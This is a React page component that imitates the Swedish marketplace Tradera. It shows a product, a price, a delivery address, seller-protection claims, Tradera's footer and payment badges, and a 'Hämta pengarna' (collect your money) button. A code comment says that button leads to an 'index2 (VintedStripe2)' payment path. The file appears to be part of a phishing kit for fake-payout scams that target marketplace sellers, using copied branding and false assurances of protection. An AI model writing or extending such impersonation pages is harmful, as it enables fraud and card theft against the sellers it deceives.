import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './TraderaSeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/tradera-se-logo.png`;

function noop(e) {
  e.preventDefault();
}

function ShareIcon() {
  return (
    <svg className="tradera-se-share" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M4 12v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2v-8M16 6l-4-4-4 4M12 2v13" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

function SellerShieldIcon() {
  return (
    <svg className="tradera-se-shield-svg" viewBox="0 0 48 48" fill="none" aria-hidden>
      <path d="M24 4L8 10v12c0 10 8 18 16 20 8-2 16-10 16-20V10L24 4z" stroke="#1b5e20" strokeWidth="2" fill="#e8f5e9" />
      <rect x="14" y="18" width="20" height="14" rx="2" fill="#fff" stroke="#1b5e20" strokeWidth="1.2" />
      <path d="M18 22h12M18 26h8" stroke="#333" strokeWidth="1.2" strokeLinecap="round" />
      <path d="M28 30l-4-4-2 2" stroke="#1b5e20" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

const FOOTER_COLS = [
  {
    title: 'Köp',
    links: [
      'Så handlar du på Tradera',
      'Kategorier',
      'Populära varumärken',
      'Inspiration',
      'Grön frakt',
      'Köp nu - betala senare',
    ],
  },
  {
    title: 'Sälj',
    links: [
      'Så säljer du som privatperson',
      'Sälj som företag',
      'Donera med Tradera',
      'Fraktkalkylatorn',
      'Butik',
      'Priser',
      'ProLister',
    ],
  },
  {
    title: 'Kontakt & Hjälp',
    links: [
      'Regler',
      'Press',
      'Säkerhet',
      'Vanliga frågor & svar',
      'Vad är nytt?',
      'Kontakta oss',
      'Integritetsinställningar',
    ],
  },
  {
    title: 'Information',
    links: ['Användaravtal', 'Integritetspolicy', 'Cookies', 'Om Tradera', 'Jobba på Tradera'],
  },
];

/**
 * Tradera (SE) — produktsida / utbetalning, CTA → index2 (VintedStripe2).
 */
function TraderaSeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'SE').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'SEK';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const address = (pageData?.delivery_address || '').trim() || '—';
  const productTitle = (pageData?.product_name || '').trim() || '—';
  const photoUrl = (pageData?.photo_url || '').trim();
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="tradera-se-wrap">
        <header className="tradera-se-header">
          <div className="tradera-se-header-inner">
            <img src={LOGO_SRC} alt="" className="tradera-se-logo" width={120} height={28} />
          </div>
        </header>
        <main className="tradera-se-main tradera-se-main--loading">Laddar…</main>
        <div className="tradera-se-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="tradera-se-wrap">
      <header className="tradera-se-header">
        <div className="tradera-se-header-inner">
          <a href="#/" className="tradera-se-logo-link" onClick={noop}>
            <img src={LOGO_SRC} alt="Tradera" className="tradera-se-logo" width={120} height={28} />
          </a>
          <div className="tradera-se-search-wrap">
            <input
              type="search"
              className="tradera-se-search"
              placeholder="Vad letar du efter?"
              readOnly
              aria-label="Sök"
            />
          </div>
          <a href="#/" className="tradera-se-ny-annons" onClick={noop}>
            Ny annons
          </a>
        </div>
      </header>

      <main className="tradera-se-main">
        <div className="tradera-se-product">
          <div className="tradera-se-media">
            {photoUrl && !imgFailed ? (
              <img src={photoUrl} alt="" className="tradera-se-photo" onError={() => setImgFailed(true)} />
            ) : (
              <div className="tradera-se-photo tradera-se-photo--ph" aria-hidden>
                {(productTitle !== '—' ? productTitle : 'Artikel').slice(0, 2).toUpperCase()}
              </div>
            )}
          </div>
          <div className="tradera-se-detail">
            <div className="tradera-se-detail-head">
              <h1 className="tradera-se-title">{productTitle}</h1>
              <button type="button" className="tradera-se-share-btn" aria-label="Dela">
                <ShareIcon />
              </button>
            </div>
            <p className="tradera-se-price-line">
              <span className="tradera-se-price">{amountLine}</span>
            </p>
            <Link to={index2Path} className="tradera-se-cta">
              Hämta pengarna
            </Link>
            <div className="tradera-se-ship">
              <span className="tradera-se-ship-label">Frakt</span>
              <span className="tradera-se-ship-val">{address}</span>
            </div>
            <section className="tradera-se-protect" aria-labelledby="tradera-se-protect-h">
              <div className="tradera-se-protect-head">
                <SellerShieldIcon />
                <h2 id="tradera-se-protect-h">Skydd för säljare</h2>
              </div>
              <ul className="tradera-se-protect-list">
                <li>
                  Vår kryptering hjälper till att hålla dina onlinetransaktioner starkt skyddade från början till
                  slut.
                </li>
                <li>
                  Om det uppstår problem med en transaktion håller vi inne pengarna tills problemet är löst. Vi
                  undersöker och är involverade i varje steg på vägen.
                </li>
              </ul>
            </section>
          </div>
        </div>
      </main>

      <footer className="tradera-se-footer">
        <div className="tradera-se-footer-inner">
          <div className="tradera-se-footer-grid">
            {FOOTER_COLS.map((col) => (
              <div key={col.title} className="tradera-se-footer-col">
                <div className="tradera-se-footer-col-title">{col.title}</div>
                <ul className="tradera-se-footer-links">
                  {col.links.map((label) => (
                    <li key={label}>
                      <a href="#/" onClick={noop}>
                        {label}
                      </a>
                    </li>
                  ))}
                </ul>
              </div>
            ))}
            <div className="tradera-se-footer-seal" aria-hidden>
              <div className="tradera-se-seal-ring">
                <span className="tradera-se-seal-text">TRADERA</span>
                <span className="tradera-se-seal-sub">THE CIRCULAR MARKET</span>
              </div>
            </div>
          </div>
          <div className="tradera-se-footer-social">
            <span className="tradera-se-soc-pill">f</span>
            <span className="tradera-se-soc-pill">♪</span>
            <span className="tradera-se-soc-pill">◎</span>
            <span className="tradera-se-soc-pill">in</span>
            <span className="tradera-se-soc-pill">ID</span>
          </div>
          <div className="tradera-se-footer-apps">
            <span className="tradera-se-app-badge">App Store</span>
            <span className="tradera-se-app-badge">Google Play</span>
          </div>
          <div className="tradera-se-trust-row" aria-label="Leverantörer och betalning">
            <span>PostNord</span>
            <span>DB Schenker</span>
            <span>DHL</span>
            <span>VISA</span>
            <span>Mastercard</span>
            <span>Swish</span>
            <span>Klarna</span>
            <span>Trustly</span>
            <span>Google Pay</span>
            <span>Apple Pay</span>
          </div>
          <p className="tradera-se-copy">© 2025 Tradera</p>
        </div>
      </footer>

      <div className="tradera-se-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default TraderaSeSuccess;
